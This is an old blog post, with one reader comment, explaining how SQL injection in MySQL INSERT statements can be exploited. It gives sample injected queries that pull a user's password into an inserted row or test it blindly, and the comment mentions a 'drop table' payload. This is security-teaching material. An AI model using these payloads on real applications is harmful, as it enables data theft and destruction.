Exploiting SQL Injections In Insert Statements

October 7, 2007

Exploiting SQL Injections in Insert Statement, is not trivial as most of the times you do not directly see the output of the injected query.

Unlike MS-SQL, mysql 'generally' do not support use of multiple queries which is a common trick of exploiting SQL Injections when backend database is MS-SQL.

—————————————————- 

Example 1 

Lets consider a vulnerable example, the injection point being $id (integer field) in the following statement:-

insert into secret values($id, 'Welcome');

———————————————————– —–

Exploit 

insert into secret values(1000, (select passwd from users where id=1))#, 'Welcome');

'#' comments out the rest of the query.

—————————————————————— 

Example 2  Blind Injection

scenario:- injection is in last column of the query and is an integer field, hence an attacker can not directly select a password in an integer field

Query:- insert into secret values('WELCOME', $id);

EXPLOIT:- 

insert into secret values('WELCOME', (select if (passwd ='mypass',1,0) from users where id=1))#);

————————————————————————–

If 'magic_quotes' is enabled then one can use functions like ascii() and substr() to exploit it. 

Question:-  Can you exploit the above (example.2), if $id happens to be a string field. Let us know How.!!.:)

Comments

1 Comment

  • Arvind says:

    A late comment but one none the less 😉 . Say there’s a situation where there is just 1 field which is vulnerable to SQL Injection and the query passed to the DB is an Insert query…just like you mentioned here. For simplicity lets say its numeric like you say. Lets say its PHP-MySQL(so no stacked queries) like admin’;drop table blah#

    Now what’s the max that can be done by an attacker here? The way I see it he can:
    — By crafting a SELECT query like you mention, detect that a dynamic query is being used. Hence be able to insert the result of the SQL query as a value which is part of the Insert query.

    — However there is no way he can select data from other tables whose name he does not know and cannot enumerate. So unless you guess tables etc there isn’t much you can do..rt?

    Is there something I have missed?

    Thnx
    Arvind

Leave a Reply

Your email address will not be published. Required fields are marked *

Trackback